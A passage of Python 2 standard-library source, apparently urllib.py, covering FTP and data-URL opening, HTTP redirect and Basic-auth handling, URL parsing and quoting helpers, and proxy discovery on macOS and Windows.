(localhost(), thishost()): urlfile = file if file[:1] == '/': urlfile = 'file://' + file return addinfourl(open(localname, 'rb'), headers, urlfile) raise IOError, ('local file error', 'not on local host') def open_ftp(self, url): """Use FTP protocol.""" if not isinstance(url, str): raise IOError, ('ftp error', 'proxy support for ftp protocol currently not implemented') import mimetypes, mimetools try: from cStringIO import StringIO except ImportError: from StringIO import StringIO host, path = splithost(url) if not host: raise IOError, ('ftp error', 'no host given') host, port = splitport(host) user, host = splituser(host) if user: user, passwd = splitpasswd(user) else: passwd = None host = unquote(host) user = unquote(user or '') passwd = unquote(passwd or '') host = socket.gethostbyname(host) if not port: import ftplib port = ftplib.FTP_PORT else: port = int(port) path, attrs = splitattr(path) path = unquote(path) dirs = path.split('/') dirs, file = dirs[:-1], dirs[-1] if dirs and not dirs[0]: dirs = dirs[1:] if dirs and not dirs[0]: dirs[0] = '/' key = user, host, port, '/'.join(dirs) # XXX thread unsafe! 
if len(self.ftpcache) > MAXFTPCACHE: # Prune the cache, rather arbitrarily for k in self.ftpcache.keys(): if k != key: v = self.ftpcache[k] del self.ftpcache[k] v.close() try: if not key in self.ftpcache: self.ftpcache[key] = \ ftpwrapper(user, passwd, host, port, dirs) if not file: type = 'D' else: type = 'I' for attr in attrs: attr, value = splitvalue(attr) if attr.lower() == 'type' and \ value in ('a', 'A', 'i', 'I', 'd', 'D'): type = value.upper() (fp, retrlen) = self.ftpcache[key].retrfile(file, type) mtype = mimetypes.guess_type("ftp:" + url)[0] headers = "" if mtype: headers += "Content-Type: %s\n" % mtype if retrlen is not None and retrlen >= 0: headers += "Content-Length: %d\n" % retrlen headers = mimetools.Message(StringIO(headers)) return addinfourl(fp, headers, "ftp:" + url) except ftperrors(), msg: raise IOError, ('ftp error', msg), sys.exc_info()[2] def open_data(self, url, data=None): """Use "data" URL.""" if not isinstance(url, str): raise IOError, ('data error', 'proxy support for data protocol currently not implemented') # ignore POSTed data # # syntax of data URLs: # dataurl := "data:" [ mediatype ] [ ";base64" ] "," data # mediatype := [ type "/" subtype ] *( ";" parameter ) # data := *urlchar # parameter := attribute "=" value import mimetools try: from cStringIO import StringIO except ImportError: from StringIO import StringIO try: [type, data] = url.split(',', 1) except ValueError: raise IOError, ('data error', 'bad data URL') if not type: type = 'text/plain;charset=US-ASCII' semi = type.rfind(';') if semi >= 0 and '=' not in type[semi:]: encoding = type[semi+1:] type = type[:semi] else: encoding = '' msg = [] msg.append('Date: %s'%time.strftime('%a, %d %b %Y %T GMT', time.gmtime(time.time()))) msg.append('Content-type: %s' % type) if encoding == 'base64': import base64 data = base64.decodestring(data) else: data = unquote(data) msg.append('Content-Length: %d' % len(data)) msg.append('') msg.append(data) msg = '\n'.join(msg) f = StringIO(msg) 
headers = mimetools.Message(f, 0) #f.fileno = None # needed for addinfourl return addinfourl(f, headers, url) class FancyURLopener(URLopener): """Derived class with handlers for errors we can handle (perhaps).""" def __init__(self, *args, **kwargs): URLopener.__init__(self, *args, **kwargs) self.auth_cache = {} self.tries = 0 self.maxtries = 10 def http_error_default(self, url, fp, errcode, errmsg, headers): """Default error handling -- don't raise an exception.""" return addinfourl(fp, headers, "http:" + url, errcode) def http_error_302(self, url, fp, errcode, errmsg, headers, data=None): """Error 302 -- relocated (temporarily).""" self.tries += 1 if self.maxtries and self.tries >= self.maxtries: if hasattr(self, "http_error_500"): meth = self.http_error_500 else: meth = self.http_error_default self.tries = 0 return meth(url, fp, 500, "Internal Server Error: Redirect Recursion", headers) result = self.redirect_internal(url, fp, errcode, errmsg, headers, data) self.tries = 0 return result def redirect_internal(self, url, fp, errcode, errmsg, headers, data): if 'location' in headers: newurl = headers['location'] elif 'uri' in headers: newurl = headers['uri'] else: return void = fp.read() fp.close() # In case the server sent a relative URL, join with original: newurl = basejoin(self.type + ":" + url, newurl) return self.open(newurl) def http_error_301(self, url, fp, errcode, errmsg, headers, data=None): """Error 301 -- also relocated (permanently).""" return self.http_error_302(url, fp, errcode, errmsg, headers, data) def http_error_303(self, url, fp, errcode, errmsg, headers, data=None): """Error 303 -- also relocated (essentially identical to 302).""" return self.http_error_302(url, fp, errcode, errmsg, headers, data) def http_error_307(self, url, fp, errcode, errmsg, headers, data=None): """Error 307 -- relocated, but turn POST into error.""" if data is None: return self.http_error_302(url, fp, errcode, errmsg, headers, data) else: return 
self.http_error_default(url, fp, errcode, errmsg, headers) def http_error_401(self, url, fp, errcode, errmsg, headers, data=None): """Error 401 -- authentication required. This function supports Basic authentication only.""" if not 'www-authenticate' in headers: URLopener.http_error_default(self, url, fp, errcode, errmsg, headers) stuff = headers['www-authenticate'] import re match = re.match('[ \t]*([^ \t]+)[ \t]+realm="([^"]*)"', stuff) if not match: URLopener.http_error_default(self, url, fp, errcode, errmsg, headers) scheme, realm = match.groups() if scheme.lower() != 'basic': URLopener.http_error_default(self, url, fp, errcode, errmsg, headers) name = 'retry_' + self.type + '_basic_auth' if data is None: return getattr(self,name)(url, realm) else: return getattr(self,name)(url, realm, data) def http_error_407(self, url, fp, errcode, errmsg, headers, data=None): """Error 407 -- proxy authentication required. This function supports Basic authentication only.""" if not 'proxy-authenticate' in headers: URLopener.http_error_default(self, url, fp, errcode, errmsg, headers) stuff = headers['proxy-authenticate'] import re match = re.match('[ \t]*([^ \t]+)[ \t]+realm="([^"]*)"', stuff) if not match: URLopener.http_error_default(self, url, fp, errcode, errmsg, headers) scheme, realm = match.groups() if scheme.lower() != 'basic': URLopener.http_error_default(self, url, fp, errcode, errmsg, headers) name = 'retry_proxy_' + self.type + '_basic_auth' if data is None: return getattr(self,name)(url, realm) else: return getattr(self,name)(url, realm, data) def retry_proxy_http_basic_auth(self, url, realm, data=None): host, selector = splithost(url) newurl = 'http://' + host + selector proxy = self.proxies['http'] urltype, proxyhost = splittype(proxy) proxyhost, proxyselector = splithost(proxyhost) i = proxyhost.find('@') + 1 proxyhost = proxyhost[i:] user, passwd = self.get_user_passwd(proxyhost, realm, i) if not (user or passwd): return None proxyhost = quote(user, safe='') + 
':' + quote(passwd, safe='') + '@' + proxyhost self.proxies['http'] = 'http://' + proxyhost + proxyselector if data is None: return self.open(newurl) else: return self.open(newurl, data) def retry_proxy_https_basic_auth(self, url, realm, data=None): host, selector = splithost(url) newurl = 'https://' + host + selector proxy = self.proxies['https'] urltype, proxyhost = splittype(proxy) proxyhost, proxyselector = splithost(proxyhost) i = proxyhost.find('@') + 1 proxyhost = proxyhost[i:] user, passwd = self.get_user_passwd(proxyhost, realm, i) if not (user or passwd): return None proxyhost = quote(user, safe='') + ':' + quote(passwd, safe='') + '@' + proxyhost self.proxies['https'] = 'https://' + proxyhost + proxyselector if data is None: return self.open(newurl) else: return self.open(newurl, data) def retry_http_basic_auth(self, url, realm, data=None): host, selector = splithost(url) i = host.find('@') + 1 host = host[i:] user, passwd = self.get_user_passwd(host, realm, i) if not (user or passwd): return None host = quote(user, safe='') + ':' + quote(passwd, safe='') + '@' + host newurl = 'http://' + host + selector if data is None: return self.open(newurl) else: return self.open(newurl, data) def retry_https_basic_auth(self, url, realm, data=None): host, selector = splithost(url) i = host.find('@') + 1 host = host[i:] user, passwd = self.get_user_passwd(host, realm, i) if not (user or passwd): return None host = quote(user, safe='') + ':' + quote(passwd, safe='') + '@' + host newurl = 'https://' + host + selector if data is None: return self.open(newurl) else: return self.open(newurl, data) def get_user_passwd(self, host, realm, clear_cache = 0): key = realm + '@' + host.lower() if key in self.auth_cache: if clear_cache: del self.auth_cache[key] else: return self.auth_cache[key] user, passwd = self.prompt_user_passwd(host, realm) if user or passwd: self.auth_cache[key] = (user, passwd) return user, passwd def prompt_user_passwd(self, host, realm): """Override this 
        in a GUI environment!"""
        import getpass
        try:
            user = raw_input("Enter username for %s at %s: " % (realm, host))
            passwd = getpass.getpass("Enter password for %s in %s at %s: " %
                (user, realm, host))
            return user, passwd
        except KeyboardInterrupt:
            # Ctrl-C means "no credentials", not "abort the transfer".
            print
            return None, None


# Utility functions

_localhost = None
def localhost():
    """Return the IP address of the magic hostname 'localhost'."""
    # Resolved once, then cached in the module-level _localhost.
    global _localhost
    if _localhost is None:
        _localhost = socket.gethostbyname('localhost')
    return _localhost

_thishost = None
def thishost():
    """Return the IP address of the current host."""
    # Cached after the first successful lookup.
    global _thishost
    if _thishost is None:
        _thishost = socket.gethostbyname(socket.gethostname())
    return _thishost

_ftperrors = None
def ftperrors():
    """Return the set of errors raised by the FTP class."""
    # Imported lazily so ftplib is only loaded when FTP is actually used.
    global _ftperrors
    if _ftperrors is None:
        import ftplib
        _ftperrors = ftplib.all_errors
    return _ftperrors

_noheaders = None
def noheaders():
    """Return an empty mimetools.Message object."""
    global _noheaders
    if _noheaders is None:
        import mimetools
        try:
            from cStringIO import StringIO
        except ImportError:
            from StringIO import StringIO
        _noheaders = mimetools.Message(StringIO(), 0)
        _noheaders.fp.close()   # Recycle file descriptor
    return _noheaders


# Utility classes

class ftpwrapper:
    """Class used by open_ftp() for cache of open FTP connections."""

    def __init__(self, user, passwd, host, port, dirs,
                 timeout=socket._GLOBAL_DEFAULT_TIMEOUT):
        self.user = user
        self.passwd = passwd
        self.host = host
        self.port = port
        self.dirs = dirs
        self.timeout = timeout
        self.init()

    def init(self):
        # (Re)connect and log in, then descend into the cached directory path.
        import ftplib
        self.busy = 0
        self.ftp = ftplib.FTP()
        self.ftp.connect(self.host, self.port, self.timeout)
        self.ftp.login(self.user, self.passwd)
        for dir in self.dirs:
            self.ftp.cwd(dir)

    def retrfile(self, file, type):
        """Retrieve *file* in transfer mode *type* ('I', 'A', or 'D'/'d'
        for a directory listing); return (readable-object, length)."""
        import ftplib
        self.endtransfer()
        if type in ('d', 'D'): cmd = 'TYPE A'; isdir = 1
        else: cmd = 'TYPE ' + type; isdir = 0
        try:
            self.ftp.voidcmd(cmd)
        except ftplib.all_errors:
            # Connection may have gone stale; reconnect and retry once.
            self.init()
            self.ftp.voidcmd(cmd)
        conn = None
        if file and not isdir:
            # Try to retrieve as a file
            try:
                cmd = 'RETR ' + file
                conn = self.ftp.ntransfercmd(cmd)
            except ftplib.error_perm, reason:
                # 550 means "not a plain file"; fall through to a listing.
                if str(reason)[:3] != '550':
                    raise IOError, ('ftp error', reason), sys.exc_info()[2]
        if not conn:
            # Set transfer mode to ASCII!
            self.ftp.voidcmd('TYPE A')
            # Try a directory listing. Verify that directory exists.
            if file:
                pwd = self.ftp.pwd()
                try:
                    try:
                        self.ftp.cwd(file)
                    except ftplib.error_perm, reason:
                        raise IOError, ('ftp error', reason), sys.exc_info()[2]
                finally:
                    self.ftp.cwd(pwd)
                cmd = 'LIST ' + file
            else:
                cmd = 'LIST'
            conn = self.ftp.ntransfercmd(cmd)
        self.busy = 1
        # Pass back both a suitably decorated object and a retrieval length
        return (addclosehook(conn[0].makefile('rb'),
                             self.endtransfer), conn[1])

    def endtransfer(self):
        # Drain the end-of-transfer response so the control channel is reusable.
        if not self.busy:
            return
        self.busy = 0
        try:
            self.ftp.voidresp()
        except ftperrors():
            pass

    def close(self):
        self.endtransfer()
        try:
            self.ftp.close()
        except ftperrors():
            pass


class addbase:
    """Base class for addinfo and addclosehook."""

    def __init__(self, fp):
        self.fp = fp
        # Delegate the file protocol to the wrapped object, but only for
        # the methods it actually provides.
        self.read = self.fp.read
        self.readline = self.fp.readline
        if hasattr(self.fp, "readlines"):
            self.readlines = self.fp.readlines
        if hasattr(self.fp, "fileno"):
            self.fileno = self.fp.fileno
        else:
            self.fileno = lambda: None
        if hasattr(self.fp, "__iter__"):
            self.__iter__ = self.fp.__iter__
            if hasattr(self.fp, "next"):
                self.next = self.fp.next

    def __repr__(self):
        return '<%s at %r whose fp = %r>' % (self.__class__.__name__,
                                             id(self), self.fp)

    def close(self):
        # Drop the delegated bound methods so a closed wrapper fails loudly.
        self.read = None
        self.readline = None
        self.readlines = None
        self.fileno = None
        if self.fp: self.fp.close()
        self.fp = None


class addclosehook(addbase):
    """Class to add a close hook to an open file."""

    def __init__(self, fp, closehook, *hookargs):
        addbase.__init__(self, fp)
        self.closehook = closehook
        self.hookargs = hookargs

    def close(self):
        addbase.close(self)
        # Run the hook exactly once, then clear it.
        if self.closehook:
            self.closehook(*self.hookargs)
            self.closehook = None
            self.hookargs = None


class addinfo(addbase):
    """class to add an info() method to an open file."""

    def __init__(self, fp, headers):
        addbase.__init__(self, fp)
        self.headers = headers

    def info(self):
        return self.headers


class addinfourl(addbase):
    """class to add info() and geturl() methods to an open file."""

    def __init__(self, fp, headers, url, code=None):
        addbase.__init__(self, fp)
        self.headers = headers
        self.url = url
        self.code = code

    def info(self):
        return self.headers

    def getcode(self):
        return self.code

    def geturl(self):
        return self.url


# Utilities to parse URLs (most of these return None for missing parts):
# unwrap('<URL:type://host/path>') --> 'type://host/path'
# splittype('type:opaquestring') --> 'type', 'opaquestring'
# splithost('//host[:port]/path') --> 'host[:port]', '/path'
# splituser('user[:passwd]@host[:port]') --> 'user[:passwd]', 'host[:port]'
# splitpasswd('user:passwd') -> 'user', 'passwd'
# splitport('host:port') --> 'host', 'port'
# splitquery('/path?query') --> '/path', 'query'
# splittag('/path#tag') --> '/path', 'tag'
# splitattr('/path;attr1=value1;attr2=value2;...') ->
#   '/path', ['attr1=value1', 'attr2=value2', ...]
# splitvalue('attr=value') --> 'attr', 'value'
# unquote('abc%20def') -> 'abc def'
# quote('abc def') -> 'abc%20def')

try:
    unicode
except NameError:
    # Narrow builds / restricted environments without unicode.
    def _is_unicode(x):
        return 0
else:
    def _is_unicode(x):
        return isinstance(x, unicode)

def toBytes(url):
    """toBytes(u"URL") --> 'URL'."""
    # Most URL schemes require ASCII.
    # If that changes, the conversion can be relaxed.
    if _is_unicode(url):
        try:
            url = url.encode("ASCII")
        except UnicodeError:
            raise UnicodeError("URL " + repr(url) +
                               " contains non-ASCII characters")
    return url

def unwrap(url):
    """unwrap('<URL:type://host/path>') --> 'type://host/path'."""
    url = url.strip()
    if url[:1] == '<' and url[-1:] == '>':
        url = url[1:-1].strip()
    if url[:4] == 'URL:': url = url[4:].strip()
    return url

# Each split* helper lazily compiles its regex once and caches it in a
# module-level global, so importing urllib does not pay the re cost up front.

_typeprog = None
def splittype(url):
    """splittype('type:opaquestring') --> 'type', 'opaquestring'."""
    global _typeprog
    if _typeprog is None:
        import re
        _typeprog = re.compile('^([^/:]+):')

    match = _typeprog.match(url)
    if match:
        scheme = match.group(1)
        return scheme.lower(), url[len(scheme) + 1:]
    return None, url

_hostprog = None
def splithost(url):
    """splithost('//host[:port]/path') --> 'host[:port]', '/path'."""
    global _hostprog
    if _hostprog is None:
        import re
        _hostprog = re.compile('^//([^/?]*)(.*)$')

    match = _hostprog.match(url)
    if match: return match.group(1, 2)
    return None, url

_userprog = None
def splituser(host):
    """splituser('user[:passwd]@host[:port]') --> 'user[:passwd]', 'host[:port]'."""
    global _userprog
    if _userprog is None:
        import re
        _userprog = re.compile('^(.*)@(.*)$')

    match = _userprog.match(host)
    if match: return map(unquote, match.group(1, 2))
    return None, host

_passwdprog = None
def splitpasswd(user):
    """splitpasswd('user:passwd') -> 'user', 'passwd'."""
    global _passwdprog
    if _passwdprog is None:
        import re
        _passwdprog = re.compile('^([^:]*):(.*)$')

    match = _passwdprog.match(user)
    if match: return match.group(1, 2)
    return user, None

# splittag('/path#tag') --> '/path', 'tag'
_portprog = None
def splitport(host):
    """splitport('host:port') --> 'host', 'port'."""
    global _portprog
    if _portprog is None:
        import re
        _portprog = re.compile('^(.*):([0-9]+)$')

    match = _portprog.match(host)
    if match: return match.group(1, 2)
    return host, None

_nportprog = None
def splitnport(host, defport=-1):
    """Split host and port, returning numeric port.
    Return given default port if no ':' found; defaults to -1.
    Return numerical port if a valid number are found after ':'.
    Return None if ':' but not a valid number."""
    global _nportprog
    if _nportprog is None:
        import re
        _nportprog = re.compile('^(.*):(.*)$')

    match = _nportprog.match(host)
    if match:
        host, port = match.group(1, 2)
        try:
            if not port: raise ValueError, "no digits"
            nport = int(port)
        except ValueError:
            # ':' present but no valid number after it.
            nport = None
        return host, nport
    return host, defport

_queryprog = None
def splitquery(url):
    """splitquery('/path?query') --> '/path', 'query'."""
    global _queryprog
    if _queryprog is None:
        import re
        _queryprog = re.compile('^(.*)\?([^?]*)$')

    match = _queryprog.match(url)
    if match: return match.group(1, 2)
    return url, None

_tagprog = None
def splittag(url):
    """splittag('/path#tag') --> '/path', 'tag'."""
    global _tagprog
    if _tagprog is None:
        import re
        _tagprog = re.compile('^(.*)#([^#]*)$')

    match = _tagprog.match(url)
    if match: return match.group(1, 2)
    return url, None

def splitattr(url):
    """splitattr('/path;attr1=value1;attr2=value2;...') ->
        '/path', ['attr1=value1', 'attr2=value2', ...]."""
    words = url.split(';')
    return words[0], words[1:]

_valueprog = None
def splitvalue(attr):
    """splitvalue('attr=value') --> 'attr', 'value'."""
    global _valueprog
    if _valueprog is None:
        import re
        _valueprog = re.compile('^([^=]*)=(.*)$')

    match = _valueprog.match(attr)
    if match: return match.group(1, 2)
    return attr, None

# Precomputed table mapping two hex digits (both cases) to the byte they
# denote; lets unquote() decode an escape with one dict lookup.
_hextochr = dict(('%02x' % i, chr(i)) for i in range(256))
_hextochr.update(('%02X' % i, chr(i)) for i in range(256))

def unquote(s):
    """unquote('abc%20def') -> 'abc def'."""
    res = s.split('%')
    for i in xrange(1, len(res)):
        item = res[i]
        try:
            res[i] = _hextochr[item[:2]] + item[2:]
        except KeyError:
            # Not followed by two hex digits: keep the '%' literally.
            res[i] = '%' + item
        except UnicodeDecodeError:
            # Unicode input: decode the pair of hex digits manually.
            res[i] = unichr(int(item[:2], 16)) + item[2:]
    return "".join(res)

def unquote_plus(s):
    """unquote('%7e/abc+def') -> '~/abc def'"""
    s = s.replace('+', ' ')
    return unquote(s)

always_safe = ('ABCDEFGHIJKLMNOPQRSTUVWXYZ'
               'abcdefghijklmnopqrstuvwxyz'
               '0123456789' '_.-')
# Cache of per-"safe" translation tables built by quote().
_safemaps = {}

def quote(s, safe = '/'):
    """quote('abc def') -> 'abc%20def'

    Each part of a URL, e.g. the path info, the query, etc., has a
    different set of reserved characters that must be quoted.

    RFC 2396 Uniform Resource Identifiers (URI): Generic Syntax lists
    the following reserved characters.

    reserved    = ";" | "/" | "?" | ":" | "@" | "&" | "=" | "+" |
                  "$" | ","

    Each of these characters is reserved in some component of a URL,
    but not necessarily in all of them.

    By default, the quote function is intended for quoting the path
    section of a URL.  Thus, it will not encode '/'.  This character
    is reserved, but in typical usage the quote function is being
    called on a path where the existing slash characters are used as
    reserved characters.
    """
    cachekey = (safe, always_safe)
    try:
        safe_map = _safemaps[cachekey]
    except KeyError:
        # First time for this safe set: build a 256-entry char -> quoted
        # string table and cache it.
        safe += always_safe
        safe_map = {}
        for i in range(256):
            c = chr(i)
            safe_map[c] = (c in safe) and c or ('%%%02X' % i)
        _safemaps[cachekey] = safe_map
    res = map(safe_map.__getitem__, s)
    return ''.join(res)

def quote_plus(s, safe = ''):
    """Quote the query fragment of a URL; replacing ' ' with '+'"""
    if ' ' in s:
        # Temporarily mark space as safe so quote() leaves it, then
        # convert to '+' per the form-encoding convention.
        s = quote(s, safe + ' ')
        return s.replace(' ', '+')
    return quote(s, safe)

def urlencode(query,doseq=0):
    """Encode a sequence of two-element tuples or dictionary into a URL query string.

    If any values in the query arg are sequences and doseq is true, each
    sequence element is converted to a separate parameter.

    If the query arg is a sequence of two-element tuples, the order of the
    parameters in the output will match the order of parameters in the
    input.
    """

    if hasattr(query,"items"):
        # mapping objects
        query = query.items()
    else:
        # it's a bother at times that strings and string-like objects are
        # sequences...
        try:
            # non-sequence items should not work with len()
            # non-empty strings will fail this
            if len(query) and not isinstance(query[0], tuple):
                raise TypeError
            # zero-length sequences of all types will get here and succeed,
            # but that's a minor nit - since the original implementation
            # allowed empty dicts that type of behavior probably should be
            # preserved for consistency
        except TypeError:
            ty,va,tb = sys.exc_info()
            raise TypeError, "not a valid non-string sequence or mapping object", tb

    l = []
    if not doseq:
        # preserve old behavior
        for k, v in query:
            k = quote_plus(str(k))
            v = quote_plus(str(v))
            l.append(k + '=' + v)
    else:
        for k, v in query:
            k = quote_plus(str(k))
            if isinstance(v, str):
                v = quote_plus(v)
                l.append(k + '=' + v)
            elif _is_unicode(v):
                # is there a reasonable way to convert to ASCII?
                # encode generates a string, but "replace" or "ignore"
                # lose information and "strict" can raise UnicodeError
                v = quote_plus(v.encode("ASCII","replace"))
                l.append(k + '=' + v)
            else:
                try:
                    # is this a sufficient test for sequence-ness?
                    x = len(v)
                except TypeError:
                    # not a sequence
                    v = quote_plus(str(v))
                    l.append(k + '=' + v)
                else:
                    # loop over the sequence
                    for elt in v:
                        l.append(k + '=' + quote_plus(str(elt)))
    return '&'.join(l)

# Proxy handling
def getproxies_environment():
    """Return a dictionary of scheme -> proxy server URL mappings.

    Scan the environment for variables named <scheme>_proxy;
    this seems to be the standard convention.  If you need a
    different way, you can pass a proxies dictionary to the
    [Fancy]URLopener constructor.

    """
    proxies = {}
    for name, value in os.environ.items():
        name = name.lower()
        if value and name[-6:] == '_proxy':
            proxies[name[:-6]] = value
    return proxies

def proxy_bypass_environment(host):
    """Test if proxies should not be used for a particular host.

    Checks the environment for a variable named no_proxy, which should
    be a list of DNS suffixes separated by commas, or '*' for all hosts.
    """
    no_proxy = os.environ.get('no_proxy', '') or os.environ.get('NO_PROXY', '')
    # '*' is special case for always bypass
    if no_proxy == '*':
        return 1
    # strip port off host
    hostonly, port = splitport(host)
    # check if the host ends with any of the DNS suffixes
    for name in no_proxy.split(','):
        if name and (hostonly.endswith(name) or host.endswith(name)):
            return 1
    # otherwise, don't bypass
    return 0


if sys.platform == 'darwin':
    def _CFSetup(sc):
        # Declare ctypes argument/result types for the SystemConfiguration
        # and CoreFoundation calls used below; the ctypes defaults (int)
        # would truncate pointers on 64-bit builds.
        from ctypes import c_int32, c_void_p, c_char_p, c_int
        sc.CFStringCreateWithCString.argtypes = [ c_void_p, c_char_p, c_int32 ]
        sc.CFStringCreateWithCString.restype = c_void_p
        sc.SCDynamicStoreCopyProxies.argtypes = [ c_void_p ]
        sc.SCDynamicStoreCopyProxies.restype = c_void_p
        sc.CFDictionaryGetValue.argtypes = [ c_void_p, c_void_p ]
        sc.CFDictionaryGetValue.restype = c_void_p
        sc.CFStringGetLength.argtypes = [ c_void_p ]
        sc.CFStringGetLength.restype = c_int32
        sc.CFStringGetCString.argtypes = [ c_void_p, c_char_p, c_int32, c_int32 ]
        sc.CFStringGetCString.restype = c_int32
        sc.CFNumberGetValue.argtypes = [ c_void_p, c_int, c_void_p ]
        sc.CFNumberGetValue.restype = c_int32
        sc.CFRelease.argtypes = [ c_void_p ]
        sc.CFRelease.restype = None

    def _CStringFromCFString(sc, value):
        # Copy the contents of a CFString into a Python byte string.
        from ctypes import create_string_buffer
        length = sc.CFStringGetLength(value) + 1
        buff = create_string_buffer(length)
        sc.CFStringGetCString(value, buff, length, 0)
        return buff.value

    def _CFNumberToInt32(sc, cfnum):
        # Extract a 32-bit signed integer from a CFNumber.
        from ctypes import byref, c_int
        val = c_int()
        kCFNumberSInt32Type = 3
        sc.CFNumberGetValue(cfnum, kCFNumberSInt32Type, byref(val))
        return val.value


    def proxy_bypass_macosx_sysconf(host):
        """
        Return True iff this host shouldn't be accessed using a proxy

        This function uses the MacOSX framework SystemConfiguration
        to fetch the proxy information.
""" from ctypes import cdll from ctypes.util import find_library import re import socket from fnmatch import fnmatch def ip2num(ipAddr): parts = ipAddr.split('.') parts = map(int, parts) if len(parts) != 4: parts = (parts + [0, 0, 0, 0])[:4] return (parts[0] << 24) | (parts[1] << 16) | (parts[2] << 8) | parts[3] sc = cdll.LoadLibrary(find_library("SystemConfiguration")) _CFSetup(sc) hostIP = None if not sc: return False kSCPropNetProxiesExceptionsList = sc.CFStringCreateWithCString(0, "ExceptionsList", 0) kSCPropNetProxiesExcludeSimpleHostnames = sc.CFStringCreateWithCString(0, "ExcludeSimpleHostnames", 0) proxyDict = sc.SCDynamicStoreCopyProxies(None) if proxyDict is None: return False try: # Check for simple host names: if '.' not in host: exclude_simple = sc.CFDictionaryGetValue(proxyDict, kSCPropNetProxiesExcludeSimpleHostnames) if exclude_simple and _CFNumberToInt32(sc, exclude_simple): return True # Check the exceptions list: exceptions = sc.CFDictionaryGetValue(proxyDict, kSCPropNetProxiesExceptionsList) if exceptions: # Items in the list are strings like these: *.local, 169.254/16 for index in xrange(sc.CFArrayGetCount(exceptions)): value = sc.CFArrayGetValueAtIndex(exceptions, index) if not value: continue value = _CStringFromCFString(sc, value) m = re.match(r"(\d+(?:\.\d+)*)(/\d+)?", value) if m is not None: if hostIP is None: hostIP = socket.gethostbyname(host) hostIP = ip2num(hostIP) base = ip2num(m.group(1)) mask = int(m.group(2)[1:]) mask = 32 - mask if (hostIP >> mask) == (base >> mask): return True elif fnmatch(host, value): return True return False finally: sc.CFRelease(kSCPropNetProxiesExceptionsList) sc.CFRelease(kSCPropNetProxiesExcludeSimpleHostnames) def getproxies_macosx_sysconf(): """Return a dictionary of scheme -> proxy server URL mappings. This function uses the MacOSX framework SystemConfiguration to fetch the proxy information. 
""" from ctypes import cdll from ctypes.util import find_library sc = cdll.LoadLibrary(find_library("SystemConfiguration")) _CFSetup(sc) if not sc: return {} kSCPropNetProxiesHTTPEnable = sc.CFStringCreateWithCString(0, "HTTPEnable", 0) kSCPropNetProxiesHTTPProxy = sc.CFStringCreateWithCString(0, "HTTPProxy", 0) kSCPropNetProxiesHTTPPort = sc.CFStringCreateWithCString(0, "HTTPPort", 0) kSCPropNetProxiesHTTPSEnable = sc.CFStringCreateWithCString(0, "HTTPSEnable", 0) kSCPropNetProxiesHTTPSProxy = sc.CFStringCreateWithCString(0, "HTTPSProxy", 0) kSCPropNetProxiesHTTPSPort = sc.CFStringCreateWithCString(0, "HTTPSPort", 0) kSCPropNetProxiesFTPEnable = sc.CFStringCreateWithCString(0, "FTPEnable", 0) kSCPropNetProxiesFTPPassive = sc.CFStringCreateWithCString(0, "FTPPassive", 0) kSCPropNetProxiesFTPPort = sc.CFStringCreateWithCString(0, "FTPPort", 0) kSCPropNetProxiesFTPProxy = sc.CFStringCreateWithCString(0, "FTPProxy", 0) kSCPropNetProxiesGopherEnable = sc.CFStringCreateWithCString(0, "GopherEnable", 0) kSCPropNetProxiesGopherPort = sc.CFStringCreateWithCString(0, "GopherPort", 0) kSCPropNetProxiesGopherProxy = sc.CFStringCreateWithCString(0, "GopherProxy", 0) proxies = {} proxyDict = sc.SCDynamicStoreCopyProxies(None) try: # HTTP: enabled = sc.CFDictionaryGetValue(proxyDict, kSCPropNetProxiesHTTPEnable) if enabled and _CFNumberToInt32(sc, enabled): proxy = sc.CFDictionaryGetValue(proxyDict, kSCPropNetProxiesHTTPProxy) port = sc.CFDictionaryGetValue(proxyDict, kSCPropNetProxiesHTTPPort) if proxy: proxy = _CStringFromCFString(sc, proxy) if port: port = _CFNumberToInt32(sc, port) proxies["http"] = "http://%s:%i" % (proxy, port) else: proxies["http"] = "http://%s" % (proxy, ) # HTTPS: enabled = sc.CFDictionaryGetValue(proxyDict, kSCPropNetProxiesHTTPSEnable) if enabled and _CFNumberToInt32(sc, enabled): proxy = sc.CFDictionaryGetValue(proxyDict, kSCPropNetProxiesHTTPSProxy) port = sc.CFDictionaryGetValue(proxyDict, kSCPropNetProxiesHTTPSPort) if proxy: proxy = 
_CStringFromCFString(sc, proxy) if port: port = _CFNumberToInt32(sc, port) proxies["https"] = "http://%s:%i" % (proxy, port) else: proxies["https"] = "http://%s" % (proxy, ) # FTP: enabled = sc.CFDictionaryGetValue(proxyDict, kSCPropNetProxiesFTPEnable) if enabled and _CFNumberToInt32(sc, enabled): proxy = sc.CFDictionaryGetValue(proxyDict, kSCPropNetProxiesFTPProxy) port = sc.CFDictionaryGetValue(proxyDict, kSCPropNetProxiesFTPPort) if proxy: proxy = _CStringFromCFString(sc, proxy) if port: port = _CFNumberToInt32(sc, port) proxies["ftp"] = "http://%s:%i" % (proxy, port) else: proxies["ftp"] = "http://%s" % (proxy, ) # Gopher: enabled = sc.CFDictionaryGetValue(proxyDict, kSCPropNetProxiesGopherEnable) if enabled and _CFNumberToInt32(sc, enabled): proxy = sc.CFDictionaryGetValue(proxyDict, kSCPropNetProxiesGopherProxy) port = sc.CFDictionaryGetValue(proxyDict, kSCPropNetProxiesGopherPort) if proxy: proxy = _CStringFromCFString(sc, proxy) if port: port = _CFNumberToInt32(sc, port) proxies["gopher"] = "http://%s:%i" % (proxy, port) else: proxies["gopher"] = "http://%s" % (proxy, ) finally: sc.CFRelease(proxyDict) sc.CFRelease(kSCPropNetProxiesHTTPEnable) sc.CFRelease(kSCPropNetProxiesHTTPProxy) sc.CFRelease(kSCPropNetProxiesHTTPPort) sc.CFRelease(kSCPropNetProxiesFTPEnable) sc.CFRelease(kSCPropNetProxiesFTPPassive) sc.CFRelease(kSCPropNetProxiesFTPPort) sc.CFRelease(kSCPropNetProxiesFTPProxy) sc.CFRelease(kSCPropNetProxiesGopherEnable) sc.CFRelease(kSCPropNetProxiesGopherPort) sc.CFRelease(kSCPropNetProxiesGopherProxy) return proxies def proxy_bypass(host): if getproxies_environment(): return proxy_bypass_environment(host) else: return proxy_bypass_macosx_sysconf(host) def getproxies(): return getproxies_environment() or getproxies_macosx_sysconf() elif os.name == 'nt': def getproxies_registry(): """Return a dictionary of scheme -> proxy server URL mappings. Win32 uses the registry to store proxies. 
        """
        proxies = {}
        try:
            import _winreg
        except ImportError:
            # Std module, so should be around - but you never know!
            return proxies
        try:
            internetSettings = _winreg.OpenKey(_winreg.HKEY_CURRENT_USER,
                r'Software\Microsoft\Windows\CurrentVersion\Internet Settings')
